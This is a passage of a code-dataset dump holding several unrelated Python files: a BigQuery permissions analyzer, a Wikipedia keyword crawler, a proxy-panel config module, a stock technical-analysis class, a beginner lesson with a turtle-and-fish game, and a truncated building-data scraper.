table_iam = self.service.get_table_policy(table.reference)\n name: str = table.table_id # type: ignore\n table_node = TableIamPolicyNode(\n table_id=fq_table_id,\n name=name,\n policy=table_iam,\n resolve_permission_callback=self._resolve_custom_role_to_permissions,\n )\n table_node.set_parent(dataset_node)\n self._calc(Asset([fq_table_id], type=AssetType.TABLE), table_node, [])\n self.writer.close()\n\n def _calc(\n self,\n fq_table_id: Asset,\n node: PolicyNode,\n path: List[AuthzPathElement],\n permissions: Optional[List[PermissionLevel]] = None,\n ):\n \"\"\"\n Calculates permissions on the policy node and recursively search for more permissions\n on the nodes it references or its parent node.\n \"\"\"\n\n if permissions is None:\n permissions = [PermissionLevel.READ, PermissionLevel.WRITE, PermissionLevel.FULL]\n self.logger.debug(\n \"calc for %s %s %s permissions = %s path = %s}\",\n fq_table_id,\n node.type,\n node.name,\n permissions,\n list(map(lambda x: x.type, path)),\n )\n # Start by listing all immediate permissions defined on this node\n for permission in permissions:\n for member in node.get_members(permission):\n self._report_permission(fq_table_id, node, member, permission, path) # type: ignore\n\n # Then go to each reference and get the permissions from it\n for permission in permissions:\n for member in node.get_references(permission):\n ref_node = self.service.lookup_ref(member.name, self._resolve_custom_role_to_permissions)\n if ref_node is None:\n self.logger.error(\"Unable to find ref_node for member %s\", member)\n continue\n note = f\"{node.type} references {ref_node.type.lower()} {ref_node.name} with permission {permission}\"\n self._add_to_path(path, node, note, member.db_permissions)\n self._calc(fq_table_id, ref_node, path, permissions=[permission])\n path.pop()\n\n # Finally, go to the parent and get the inherited permissions\n if node.parent is not None:\n self._goto_parent(fq_table_id, node, path, permissions)\n\n def _goto_parent(\n self, fq_table_id: Asset, node: PolicyNode, path: List[AuthzPathElement], permissions: List[PermissionLevel]\n ):\n note = f\"{node.type.lower()} {node.name} is included in {node.parent.type.lower()} {node.parent.name}\" # type: ignore\n self._add_to_path(path, node, note, [])\n 
self._calc(fq_table_id, node.parent, path, permissions) # type: ignore\n path.pop()\n\n def _add_to_path(\n self, path: List[AuthzPathElement], node: PolicyNode, note: str, db_permissions: Optional[List[str]]\n ):\n if db_permissions is None:\n db_permissions = []\n self.logger.debug(\"Adding %s %s to path\", node.type, node.name)\n authz_type = GRANTED_BY_TO_PATHZ_ELEMENT[node.type]\n path.append(\n AuthzPathElement(\n node.id, node.name, authz_type, notes=[AuthzNote.to_generic_note(note)], db_permissions=db_permissions\n )\n )\n\n def _add_role_to_path(self, path: List[AuthzPathElement], member: Member):\n self.logger.debug(\"Adding role %s to path\", member.role)\n path.append(\n AuthzPathElement(\n member.role,\n member.role,\n AuthzPathElementType.ROLE,\n [AuthzNote.to_generic_note(f\"Role {member.role} is granted to {member.name}\")],\n db_permissions=member.db_permissions,\n )\n )\n\n def _report_permission(\n self,\n fq_table_id: Asset,\n node: PolicyNode,\n member: Member,\n permission: PermissionLevel,\n path: List[AuthzPathElement],\n ):\n note = f\"{member.name} has role {member.role}\"\n self._add_to_path(path, node, note, [])\n self._add_role_to_path(path, member)\n reversed_path = list(reversed(path))\n\n identity = Identity(id=f\"{member.original_identity_type}:{member.name}\", type=member.type, name=member.name)\n authz = AuthzEntry(fq_table_id, path=reversed_path, identity=identity, permission=permission)\n self.writer.write_entry(authz)\n path.pop()\n path.pop()\n\n def _resolve_custom_role_to_permissions(self, role: str) -> Optional[CustomPermission]:\n \"\"\"\n Resolve role to the highest permission level it has, or None if it has no permissions to bigquery\n \"\"\"\n row_permissions = self.service.get_permissions_by_role(role)\n db_permissions: List[str] = []\n highest_permission: Optional[PermissionLevel] = None\n for row_permission in row_permissions:\n if row_permission in WRITE_PERMISSIONS:\n highest_permission = PermissionLevel.WRITE\n db_permissions.append(row_permission)\n if row_permission in READ_PERMISSIONS:\n highest_permission = PermissionLevel.READ\n db_permissions.append(row_permission)\n if highest_permission is None:\n return None\n return CustomPermission(db_permissions, highest_permission)\n","repo_name":"SatoriCyber/universal-data-permissions-scanner","sub_path":"universal_data_permissions_scanner/datastores/bigquery/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":11747,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"19634736343","text":"__author__ = 'root'\nimport requests\nfrom bs4 import BeautifulSoup\nimport time\nimport re\nimport argparse\n\nparser = argparse.ArgumentParser(description='WebCrawler')\nparser.add_argument('--url', dest='url', action='store', default=\"http://en.wikipedia.org/wiki/Hugh_of_Saint-Cher\",help='URL')\nparser.add_argument('--kw', dest='kw', action='store',default=\"\", help='Keyword')\n\n\nargs = parser.parse_args()\n\n\n## global variables\ngv_seed = args.url\ngv_keyword=args.kw\ngv_base_url = \"http://en.wikipedia.org\"\ngv_count = 0\ngv_depth = 1\ngv_dict = {'http://en.wikipedia.org/wiki/Main_Page': 1}\ngv_unique_url_list = []\ngv_final_list=[]\nf=open(\"output.txt\",\"w\")\n\n\nclass CrawlNode(object):\n def __init__(self, url, depth):\n self.depth = depth\n self.url = url\n\n\ndef get_href(url_obj, keyword):\n \"\"\"\n :Function returns all valid anchor on the given url\n :param url_obj: CrawlNode\n :param keyword: String\n 
:return: List\n \"\"\"\n lv_response = requests.get(url_obj.url)\n time.sleep(1)\n lv_depth = url_obj.depth + 1\n lv_soup = BeautifulSoup(lv_response.content, 'lxml')\n lv_url_list = []\n if (lv_soup.find_all(text=re.compile(keyword,re.IGNORECASE),limit=1)):\n gv_final_list.append(url_obj)\n print (url_obj.url)\n with open(\"output.txt\",\"a+\") as file:\n f.write(url_obj.url+\"\\n\")\n\n\n for link in lv_soup.find_all('a'):\n lv_rel_url=str(link.get('href'))\n if \"#\" in lv_rel_url:\n lv_clean_url=lv_rel_url.split(\"#\",1)[0]\n else:\n lv_clean_url=lv_rel_url\n\n\n if \"/wiki/\" == lv_clean_url[:6] and \":\" not in lv_clean_url:\n lv_final_url = gv_base_url + lv_clean_url\n if lv_final_url in gv_dict.keys():\n continue\n else:\n lv_url_list.append(CrawlNode(lv_final_url, lv_depth))\n gv_dict[lv_final_url] = 1\n else:\n continue\n\n return lv_url_list\n\n\ndef main(url, keyword):\n \"\"\"\n :Function: Maintains a list of unique URLS\n :param url: String\n :param keyword: String\n :return:void\n \"\"\"\n\n\n gv_unique_url_list.append(CrawlNode(url, 1))\n lv_count = 0\n for temp_url in gv_unique_url_list:\n\n if len(gv_final_list) > 999 or temp_url.depth > 5:\n break\n else:\n gv_unique_url_list.extend(get_href(temp_url, keyword))\n lv_count += 1\n\n\n\nif __name__ == \"__main__\":\n main(gv_seed, gv_keyword)\n","repo_name":"patricia5859/PatriciaBagzai","sub_path":"Projects/WebCrawler/webcrawler.py","file_name":"webcrawler.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38195717511","text":"import os\nimport re\nimport random\nimport socket\nimport requests\nfrom datetime import timedelta\nfrom pymongo import MongoClient\n\nprint(\"Initializing...\")\n\n# Force ipv4 for requests\nold_getaddrinfo = socket.getaddrinfo\ndef new_getaddrinfo(*args, **kwargs):\n responses = old_getaddrinfo(*args, **kwargs)\n return [response\n for response in responses\n if response[0] == socket.AF_INET]\nsocket.getaddrinfo = new_getaddrinfo\n\ndef get_libertea_branch():\n return os.environ.get('LIBERTEA_BRANCH_NAME')\n\nLIBERTEA_VERSION = 1034\nLIBERTEA_PROXY_VERSION = 1004\nVERSION_ENDPOINT = \"https://raw.githubusercontent.com/VZiChoushaDui/Libertea/\" + get_libertea_branch() + \"/version.txt\"\n\nHAPROXY_CONTAINER_NAME = 'libertea-haproxy'\n\n# MONGODB_HOST = \"libertea-mongodb:27017\"\nMONGODB_HOST = \"localhost:27017\"\nMONGODB_USER = \"root\"\nMONGODB_DB_NAME = \"panel\"\n\nJWT_VALID_TIME = timedelta(hours=24)\n\nROUTE_IP_LISTS = [\n {\n \"id\": \"cn\",\n \"name\": \"China\",\n },\n {\n \"id\": \"ru\",\n \"name\": \"Russia\",\n },\n {\n \"id\": \"cu\",\n \"name\": \"Cuba\",\n },\n {\n \"id\": \"th\",\n \"name\": \"Thailand\",\n },\n {\n \"id\": \"tm\",\n \"name\": \"Turkmenistan\",\n },\n {\n \"id\": \"ir\",\n \"name\": \"Iran\",\n },\n {\n \"id\": \"sy\",\n \"name\": \"Syria\",\n },\n {\n \"id\": \"sa\",\n \"name\": \"Saudi Arabia\",\n },\n {\n \"id\": \"tr\",\n \"name\": \"Turkey\",\n }\n]\nROUTE_IP_LISTS = sorted(ROUTE_IP_LISTS, key=lambda k: k['name'])\n\ndef get_ip_api_url():\n return random.choice([\n 'https://api.ipify.org',\n 'https://ifconfig.io/ip',\n 'https://icanhazip.com',\n 'https://ident.me',\n 'https://ipecho.net/plain',\n 'https://myexternalip.com/raw',\n 'https://wtfismyip.com/text',\n 'https://checkip.amazonaws.com',\n ])\n\nSERVER_MAIN_IP = None\nfor i in range(5):\n try:\n ip = requests.get(get_ip_api_url(), timeout=3).content.decode('utf8').strip()\n if not 
re.match(r'^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$', ip):\n            print(\"Failed to get server ip. Result was: \" + str(ip))\n            continue\n\n        SERVER_MAIN_IP = ip\n        break\n    except Exception as e:\n        print(\"Failed to get server ip: \" + str(e))\n\nif SERVER_MAIN_IP is None:\n    raise Exception(\"couldn't fetch SERVER_MAIN_IP\")\n\nif not re.match(r'^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$', SERVER_MAIN_IP):\n    raise Exception(\"couldn't fetch SERVER_MAIN_IP. Result was: \" + str(SERVER_MAIN_IP))\n\n# print(\"SERVER_MAIN_IP: \" + SERVER_MAIN_IP)\n\ndef get_mongodb_password():\n    return os.environ.get('PANEL_MONGODB_PASSWORD')\n\ndef get_panel_secret_key():\n    return os.environ.get('PANEL_SECRET_KEY')\n\ndef get_admin_uuid():\n    return os.environ.get('PANEL_ADMIN_UUID')\n\ndef get_proxy_connect_uuid():\n    return os.environ.get('PANEL_PROXY_CONNECT_UUID')\n\ndef get_panel_domain():\n    return os.environ.get('PANEL_DOMAIN')\n\ndef get_mongodb_connection_string():\n    connstr = \"mongodb://\" + MONGODB_USER + \":\" + get_mongodb_password() + \"@\" + MONGODB_HOST\n    # print(\"connstr:\", connstr)\n    return connstr\n\n___mongoClient = None\n___mongoClientPid = None\n\ndef get_mongo_client():\n    global ___mongoClient\n    global ___mongoClientPid\n\n    my_pid = os.getpid()\n    if ___mongoClient is None or ___mongoClientPid != my_pid:\n        print(f\" -- creating mongo client on pid {my_pid}\")\n        ___mongoClient = MongoClient(get_mongodb_connection_string(), serverSelectionTimeoutMS=5000)\n        ___mongoClientPid = my_pid\n\n    try:\n        ___mongoClient.server_info()\n    except Exception as e:\n        print(f\" -- reconnecting mongo client on pid {my_pid}\")\n        ___mongoClient = MongoClient(get_mongodb_connection_string(), serverSelectionTimeoutMS=5000)\n        ___mongoClientPid = my_pid\n\n    return ___mongoClient\n\ndef get_hostcontroller_api_key():\n    return os.environ.get('HOSTCONTROLLER_API_KEY')\n\ndef get_bootstrap_script_url():\n    return \"https://raw.githubusercontent.com/VZiChoushaDui/Libertea/\" + get_libertea_branch() + \"/bootstrap.sh\"\n\ndef get_root_dir():\n    env_root_dir = os.environ.get('LIBERTEA_ROOT_DIR')\n    if env_root_dir is not None and env_root_dir != \"\":\n        path = env_root_dir\n        if path[-1] != '/':\n            path += '/'\n        return path\n    return \"/root/libertea/\"\n","repo_name":"VZiChoushaDui/Libertea","sub_path":"panel/panel/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":197,"dataset":"github-code","pt":"53"}
{"seq_id":"8777506292","text":"import numpy as np\nimport alpaca_trade_api as tradeapi\nfrom datetime import datetime, timedelta\nimport yahoo_fin.stock_info as yf\nfrom dotenv import load_dotenv\nimport json\nimport os\nimport ta\n\nclass Stockalyzer:\n    def __init__(self, symbol, interval='day', mode='store', financials=True):\n        '''\n        Class to analyze stocks using 3 technical indicators: Relative Strength Index (RSI),\n        Stochastic Oscillator, and Moving Average Convergence Divergence (MACD), plus simple moving\n        average analysis. Also performs a basic financial analysis of the company and assigns a score\n        Params: ticker - 4 letter stock name e.g. 
'MSFT'\n interval='daily'\n '''\n load_dotenv()\n \n dir_path = os.path.dirname(os.path.realpath(__file__))\n config = dir_path + \"/config.json\"\n with open(config, \"r\") as f:\n self.params = json.load(f)\n\n self.stock = symbol\n \n # Be sure to change keys in .env file if changing from paper/live\n self.api = tradeapi.REST(os.getenv('APCA_API_KEY_ID'), os.getenv('APCA_API_SECRET_KEY'), os.getenv('APCA_ENDPOINT'))\n self.account = self.api.get_account()\n \n if interval == 'day':\n self.interval = tradeapi.TimeFrame.Day\n elif interval == 'hour':\n self.interval = tradeapi.TimeFrame.Hour\n else:\n raise ValueError(\"Interval must be 'hour' or 'day'\")\n\n start = datetime.today().strftime('%Y-%m-%d')\n end = (datetime.today() - timedelta(200)).strftime('%Y-%m-%d')\n self.price_data = self.getPriceData(end, start)\n \n if self.price_data.empty:\n raise AttributeError('No Price Data found for {}'.format(self.stock))\n \n self.price = self.getPrice()\n self.adr = self.getADR()\n self.avg_50 = self.price_data['close'].tail(50).mean()\n self.avg_200 = self.price_data['close'].tail(200).mean()\n\n self.rsi = ta.momentum.RSIIndicator(self.price_data['close'], 7).rsi()\n \n stochastic = ta.momentum.StochasticOscillator(self.price_data['high'], self.price_data['low'], self.price_data['close'])\n self.stoch = stochastic.stoch()\n self.stoch_sig = stochastic.stoch_signal()\n \n macd = ta.trend.MACD(self.price_data['close'])\n self.macd = macd.macd()\n self.macd_sig = macd.macd_signal()\n \n self.financials = financials\n\n if self.financials:\n self.balance_sheet = yf.get_balance_sheet(self.stock)\n self.income_statement = yf.get_income_statement(self.stock)\n self.cfs = yf.get_cash_flow(self.stock)\n self.years = self.balance_sheet.columns\n \n self.score = self.get_score()\n self.analysis = self.get_analysis()\n\n def getPriceData(self, start, end):\n df = self.api.get_bars(self.stock, self.interval, start, end, adjustment='raw').df\n return df\n \n def getPrice(self):\n return self.price_data['close'].iloc[-1]\n\n def getADR(self):\n # Average Daily Range\n data = self.price_data.tail(self.params['technical_params']['ADR']['period'])\n \n ranges = data['high'] - data['low']\n \n return ranges.mean()\n\n def getStopPrice(self):\n return self.price - self.adr\n\n def getSellPrice(self):\n return self.price + self.adr * 2\n\n def profitability(self):\n \"\"\"\n Determine profitability of a company using income statement, balance sheet, and cash flow\n :return: p_score - total profitability score from 0 to 4\n \"\"\"\n\n if not self.financials:\n raise Exception(\"Financials must be enabled. 
Set financials argument to true when initializing Stockalyzer\")\n\n        p_score = 0\n\n        # Net Income\n        net_income = self.income_statement[self.years[0]]['netIncome']\n        net_income_last = self.income_statement[self.years[1]]['netIncome']\n        ni_ratio_score = 1 if net_income > net_income_last and net_income > 0 else 0\n        p_score += ni_ratio_score\n\n        # Operating Cash Flow\n        op_cf = self.cfs[self.years[0]]['totalCashFromOperatingActivities']\n        of_cf_score = 1 if op_cf > 0 else 0\n        p_score += of_cf_score\n\n        # Return on Assets\n        avg_assets = (self.balance_sheet[self.years[0]]['totalAssets'] + self.balance_sheet[self.years[1]]['totalAssets']) / 2\n        avg_assets_last = (self.balance_sheet[self.years[1]]['totalAssets'] + self.balance_sheet[self.years[2]]['totalAssets']) / 2\n        RoA = net_income / avg_assets\n        RoA_last = net_income_last / avg_assets_last\n        RoA_score = 1 if RoA > RoA_last else 0\n        p_score += RoA_score\n\n        # Accruals\n        total_assets = self.balance_sheet[self.years[0]]['totalAssets']\n        accruals = op_cf / total_assets - RoA\n        acc_score = 1 if accruals > 0 else 0\n        p_score += acc_score\n\n        return p_score\n\n    def leverage(self):\n        \"\"\"\n        Determine leverage of a company with the balance sheet\n        :return: l_score - total leverage score from 0 to 2\n        \"\"\"\n        \n        if not self.financials:\n            raise Exception(\"Financials must be enabled. Set financials argument to true when initializing Stockalyzer\")\n\n        l_score = 0\n\n        # Long-term debt ratio\n        try:\n            ltd = self.balance_sheet[self.years[0]]['longTermDebt']\n            total_assets = self.balance_sheet[self.years[0]]['totalAssets']\n            debt_ratio = ltd / total_assets\n            dr_score = 1 if debt_ratio < 0.4 else 0\n            l_score += dr_score\n        except:\n            l_score += 1\n\n        # Current ratio\n        current_assets = self.balance_sheet[self.years[0]]['totalCurrentAssets']\n        current_liab = self.balance_sheet[self.years[0]]['totalCurrentLiabilities']\n        current_ratio = current_assets / current_liab\n        cr_score = 1 if current_ratio > 1 else 0\n        l_score += cr_score\n\n        return l_score\n\n    def operating_efficiency(self):\n        \"\"\"\n        Determine operating efficiency of a company\n        :return: oe_score - score representing operating efficiency from 0 to 2\n        \"\"\"\n        \n        if not self.financials:\n            raise Exception(\"Financials must be enabled. Set financials argument to true when initializing Stockalyzer\")\n\n        oe_score = 0\n\n        # Gross margin\n        gp = self.income_statement[self.years[0]]['grossProfit']\n        gp_last = self.income_statement[self.years[1]]['grossProfit']\n        revenue = self.income_statement[self.years[0]]['totalRevenue']\n        revenue_last = self.income_statement[self.years[1]]['totalRevenue']\n        gm = gp / revenue\n        gm_last = gp_last / revenue_last\n        gm_score = 1 if gm > gm_last else 0\n        oe_score += gm_score\n\n        # Asset turnover\n        avg_assets = (self.balance_sheet[self.years[0]]['totalAssets'] + self.balance_sheet[self.years[1]]['totalAssets']) / 2\n        avg_assets_last = (self.balance_sheet[self.years[1]]['totalAssets'] + self.balance_sheet[self.years[2]]['totalAssets']) / 2\n        at = revenue / avg_assets\n        at_last = revenue_last / avg_assets_last\n        at_score = 1 if at > at_last else 0\n        oe_score += at_score\n\n        return oe_score\n\n    def get_score(self):\n        \"\"\"\n        Returns total score based on profitability, leverage, and operating efficiency\n        :return: s - total score from 0 (worst) to 8 (best)\n        \"\"\"\n        \n        if not self.financials:\n            raise Exception(\"Financials must be enabled. 
Set financials argument to true when initializing Stockalyzer\")\n\n        s = self.profitability() + self.leverage() + self.operating_efficiency()\n        return s\n\n    def get_analysis(self, timestamp='now'):\n        '''\n        Returns an analysis of a given stock in terms of a buy,\n        sell, or hold position. Estimated 9% gain\n        Return: string 'Buy', 'Sell', or 'Hold'\n        '''\n        rsi = self.rsi.iloc[-1] > 50\n        stoch = self.stoch.iloc[-1] > self.stoch_sig.iloc[-1]\n        macd = self.macd.iloc[-1] > self.macd_sig.iloc[-1]\n        up = self.price > self.avg_50 and self.avg_50 > self.avg_200\n\n        if (rsi and\n            stoch and\n            macd and\n            up):\n            return 'Buy'\n        elif (not rsi and\n              not stoch and\n              not macd and\n              not up):\n            return 'Sell'\n        else:\n            return 'Hold'\n","repo_name":"nialldevlin/Stock-tracker","sub_path":"src/stock_analyzer.py","file_name":"stock_analyzer.py","file_ext":"py","file_size_in_byte":8488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"4531658778","text":"# 0. Define an amusement-park ticket class as required, and try to compute the weekday price for 2 adults + 1 child\n# -- the regular weekday ticket costs 100 yuan\n# -- the weekend ticket costs 120% of the weekday price\n# -- children pay half price\n# The hard part of object-oriented programming is the shift in thinking\nclass Ticket():\n    # weekend: weekday or weekend; child: whether this is a child's ticket\n    def __init__(self, weekend = False, child = False):\n        self.exp = 100\n        if weekend:\n            self.inc = 1.2\n        else:\n            self.inc = 1\n        if child:\n            self.discount = 0.5\n        else:\n            self.discount = 1\n    def calcPrice(self, num):\n        return self.exp * self.inc * self.discount * num\nadult = Ticket()\nchild = Ticket(child = True)\nprint(\"Weekday price for 2 adults + 1 child: %.2f\" % (adult.calcPrice(2) + child.calcPrice(1)))\n\n\n# 0.1 Advanced: let the user enter whether it is a weekend and how many adults and children there are, then compute the price\n'''Broken: cannot change the default values of __init__'s parameters from outside'''\n#class Ticket():\n#    def __init__(self, weekend = False, child = False):\n#        self.exp = 100\n#        if weekend:\n#            self.inc = 1.2\n#        else:\n#            self.inc = 1\n#        if child:\n#            self.discount = 0.5\n#        else:\n#            self.discount = 1\n#    def calcPrice(self, adult_num, child_num):\n#        return self.inc * self.exp * adult_num + self.inc * self.exp * self.discount * child_num\n\n\n#weekend = input(\"Is it a weekend (yes or no)?\\n\")\n#adult_num = int(input(\"Enter the number of adults: \"))\n#child_num = int(input(\"Enter the number of children: \"))\n\n#if weekend == 'j':\n#    weekend = 'weekend'\n#    Ticket(weekend = True)\n#else:\n#    weekend = 'weekday'\n\n#if child_num > 0:\n#    Ticket(child = True)\n\n##t = Ticket()\n\n#print(\"%d adults and %d children: the %s price is %.2f\" % (adult_num, child_num, weekend, Ticket().calcPrice(adult_num, child_num)))\n\n\n\n\n# 1. Game programming: define a turtle class and a fish class to the spec below and try to write the game\n'''\nAssume the game scene covers the range (x,y) with 0 <= x <= 10, 0 <= y <= 10\nThe game creates 1 turtle and 10 fish\nThey all move in random directions\nThe turtle can move at most 2 steps at a time (randomly choosing 1 or 2), a fish at most 1\nWhen they reach the edge of the scene, they automatically move back in the opposite direction \nThe turtle starts with 100 stamina (the upper limit)\nEvery move costs the turtle 1 stamina\nWhen the turtle and a fish share the same coordinates, the turtle eats the fish and gains 20 stamina\nFish stamina is not tracked for now\nThe game ends when the turtle's stamina drops to 0 (it dies) or no fish are left'''\nimport random as r\n\nlegal_x = [0, 10]\nlegal_y = [0, 10]\n\nclass Turtle:\n    def __init__(self):\n        # initial stamina\n        self.power = 100\n        # random initial position\n        self.x = r.randint(legal_x[0], legal_x[1])\n        self.y = r.randint(legal_y[0], legal_y[1])\n\n    def move(self):\n        # pick a random direction and move to the new position (x, y)\n        new_x = self.x + r.choice([1, 2, -1, -2])\n        new_y = self.y + r.choice([1, 2, -1, -2])\n        # check whether the move crosses the scene's x-axis boundary\n        if new_x < legal_x[0]:\n            self.x = legal_x[0] - (new_x - legal_x[0])\n        elif new_x > legal_x[1]:\n            self.x = legal_x[1] - (new_x - legal_x[1])\n        else:\n            self.x = new_x\n        # check whether the move crosses the scene's y-axis boundary\n        if new_y < legal_y[0]:\n            self.y = legal_y[0] - (new_y - legal_y[0])\n        elif new_y > legal_y[1]:\n            self.y = legal_y[1] - (new_y - legal_y[1])\n        else:\n            self.y = new_y \n        # stamina cost\n        self.power -= 1\n        # return the new position after the move\n        return (self.x, self.y)\n\n    def eat(self):\n        self.power += 20\n        if self.power > 100:\n            self.power = 100\n\nclass Fish:\n    def __init__(self):\n        self.x = r.randint(legal_x[0], legal_x[1])\n        self.y = r.randint(legal_y[0], legal_y[1])\n    \n    def move(self):\n        # pick a random direction and move to the new position (x, y)\n        new_x = self.x + r.choice([1, -1])\n        new_y = self.y + r.choice([1, -1])\n        # check whether the move crosses the scene's x-axis boundary\n        if new_x < legal_x[0]:\n            self.x = legal_x[0] - (new_x - legal_x[0])\n        elif new_x > legal_x[1]:\n            self.x = legal_x[1] - (new_x - legal_x[1])\n        else:\n            self.x = new_x\n        # check whether the move crosses the scene's y-axis boundary\n        if new_y < legal_y[0]:\n            self.y = legal_y[0] - (new_y - legal_y[0])\n        elif new_y > legal_y[1]:\n            self.y = legal_y[1] - (new_y - legal_y[1])\n        else:\n            self.y = new_y\n        # return the new position after the move\n        return (self.x, self.y)\n\nturtle = Turtle()\nfish = []\nfor i in range(10):\n    new_fish = Fish()\n    fish.append(new_fish)\n\nwhile True:\n    if not len(fish):\n        print(\"All the fish have been eaten, game over!\")\n        break\n    if not turtle.power:\n        print(\"The turtle ran out of stamina and died!\")\n        break\n\n    pos = turtle.move()\n    # Removing list elements while iterating over the list is very dangerous and often causes unexpected problems, because the iterator references the list's data directly\n    # Here we hand the iterator a copy of the list, so removing items from the original list causes no problems ^_^\n    for each_fish in fish[:]:\n        if each_fish.move() == pos:\n            # a fish gets eaten\n            turtle.eat()\n            fish.remove(each_fish)\n            print(\"A fish has just been eaten...\")\n","repo_name":"pangfeiyo/PythonLearn","sub_path":"甲鱼python/课程代码/第37讲/动动手.py","file_name":"动动手.py","file_ext":"py","file_size_in_byte":5419,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"30551461121","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport calendar\nimport re\n\nfrom bs4 import BeautifulSoup\nfrom urllib import urlopen\nfrom urlparse import urljoin\nfrom pprint import pprint\nfrom string import digits\n\nfrom itsm.adsm import ADSMBase\n\n\nclass BuildingDetailsToADSM(ADSMBase):\n\n\t# Production\n\tuc_list = '{8E3E8107-9FEF-406F-880E-8C980E7400EE}'\n\tkey_fields = ('ID', 'Title')\n\n\tdef argument_parser(self):\n\t\tparser = super(BuildingDetailsToADSM, self).argument_parser()\n\n\t\tparser.add_argument('buildings_url', default='http://www.ucalgary.ca/facilities/buildings/', nargs='?')\n\n\t\treturn parser\n\n\tdef main(self):\n\t\tmonths_map = dict((calendar.month_name[i][:3], '%02d' % i) for i in range(1, 13))\n\t\tmonths_map.update(dict((calendar.month_name[i], '%02d' % i) for i in range(1, 13)))\n\n\t\tdef conv_date(d):\n\t\t\tif d in ('TBC', '...', '--'):\n\t\t\t\treturn None\n\t\t\tparts = d.split(' ')\n\t\t\tif len(parts) == 1: # Year\n\t\t\t\treturn '%s-01-01 00:00:00' % parts[0]\n\t\t\telif len(parts) == 2: # Month Year\n\t\t\t\treturn '%s-%s-01 00:00:00' % (parts[1], months_map.get(parts[0], '01'), )\n\t\t\treturn None\n\n\t\tfield_map = (\n\t\t\t('CIDescription', lambda r: r['Facts'][0] if len(r['Facts']) > 0 else None),\n\t\t\t('CIBusinessOwner', lambda r: self.person_ref(r['Facility Manager'][1])),\n\t\t\t('CIBuildingEmergencyP1', lambda r: filter(lambda x: '(primary)' in x, r['Emergency Assembly Points'])[0] if isinstance(r['Emergency Assembly Points'], list) else r['Emergency Assembly Points']),\n\t\t\t('CIBuildingEmergencyP2', lambda r: filter(lambda x: '(secondary)' in x, r['Emergency Assembly Points'])[0]),\n\t\t\t('CIBuildingArchitect', 'Architect'),\n\t\t\t('CISupplier', 'General Contractor'),\n\t\t\t('CIBuildingZone', 'Zone'),\n\t\t\t('CIBuildingArea', lambda r: r['Building Area'] or r['Original Building Area']),\n\t\t\t('CIDevelopmentDate', lambda r: conv_date(r['Start Date'])),\n\t\t\t('CIReleaseDate', lambda r: conv_date(r['Completion Date'])),\n\t\t\t('CIProductionFundingAmount', 'Cost'),\n\t\t\t('CIInformation', lambda r: '%s, %s' % (r['URL'], r['Building'])),\n\t\t)\n\n\t\tdef 
rows():\n\t\t\tname_map = {\n\t\t\t\t'General Services': 'General Services Building',\n\t\t\t\t'Grounds': 'Grounds Building',\n\t\t\t\t'Kinesiology Complex': 'Kinesiology A',\n\t\t\t\t'MacKimmie Library Block and Tower': 'MacKimmie Tower',\n\t\t\t\t'Materials Handling': 'Materials Handling Facility',\n\t\t\t\t'Math Sciences Building and Tower': 'Mathematical Sciences',\n\t\t\t\t'Education Block and Tower': 'Education Tower',\n\t\t\t\t'Weather Research Station': 'Weather Station',\n\t\t\t\t'Heritage Medical': 'Heritage Medical Research Building',\n\t\t\t\t'Priddis Observatory': 'Rothney Astrological Observatory Lab',\n\t\t\t\t'International House / Hotel Alma': 'International House (Dr. Fok Ying Tong)',\n\t\t\t\t'Yamnuska': 'Yamnuska Hall'\n\t\t\t}\n\n\t\t\tfor building in self.buildings():\n\t\t\t\tbuilding['AdjustedBuilding'] = name_map.get(building['Building'], building['Building'])\n\t\t\t\tyield building\n\n\t\tdef compare_f(ext_item, list_item):\n\t\t\treturn 'Update' if list_item else None\n\n\t\tself.sync_to_list_by_comparison(BuildingDetailsToADSM.uc_list, None, BuildingDetailsToADSM.key_fields, '_ows_Title', rows(), 'AdjustedBuilding', compare_f, field_map, content_type='Building', fuzzy=True, commit=not self.args.d)\n\n\tdef buildings(self):\n\t\t# Fetch the list of all buildings\n\t\tbuildings_soup = BeautifulSoup(urlopen(self.args.buildings_url))\n\t\tbuilding_anchors = buildings_soup.find_all('a', href=re.compile('/facilities/buildings/'))\n\n\t\t# For each building, fetch its information\n\t\tfor building_anchor in building_anchors:\n\t\t\tbuilding_url = urljoin(self.args.buildings_url, building_anchor['href'])\n\t\t\tbuilding_soup = BeautifulSoup(urlopen(building_url))\n\n\t\t\tinfo_heading = building_soup.find('h2', text='INFORMATION') or building_soup.find_all('h2')[5]\n\t\t\tinfo_detail_candidates = []\n\t\t\tfor sibling in info_heading.next_siblings:\n\t\t\t\tif sibling.name == 'p':\n\t\t\t\t\tinfo_detail_candidates.append(sibling)\n\t\t\t\telif sibling.name == 'h2':\n\t\t\t\t\tbreak\n\t\t\tinfo_details = max(info_detail_candidates, key=lambda x: len(x))\n\n\t\t\tinfo = {}\n\t\t\tkey, values = None, []\n\t\t\tdef commit_info(key, values):\n\t\t\t\tif key != None:\n\t\t\t\t\tvalue = values if len(values) > 1 else values[0] if len(values) == 1 else None\n\t\t\t\t\tinfo[key] = value\n\t\t\tfor child in info_details.children:\n\t\t\t\tif child.name == 'strong':\n\t\t\t\t\tcommit_info(key, values)\n\t\t\t\t\tkey = child.text.strip(u': \\xa0')\n\t\t\t\t\tvalues = []\n\t\t\t\telif child.name == None:\n\t\t\t\t\tvalue = child.strip(u' []\\xa0')\n\t\t\t\t\tif key == u'Start/Completion Date' or key == u'Date':\n\t\t\t\t\t\tdates = value.split('/')\n\t\t\t\t\t\tcommit_info(u'Start Date', (dates[0].strip(),))\n\t\t\t\t\t\tcommit_info(u'Completion Date', (dates[1].strip(),) if len(dates) > 1 else [])\n\t\t\t\t\t\tkey = None\n\t\t\t\t\telif value:\n\t\t\t\t\t\tif key in ('Building Area', 'Zone'):\n\t\t\t\t\t\t\tvalue = ''.join(c for c in value if c in 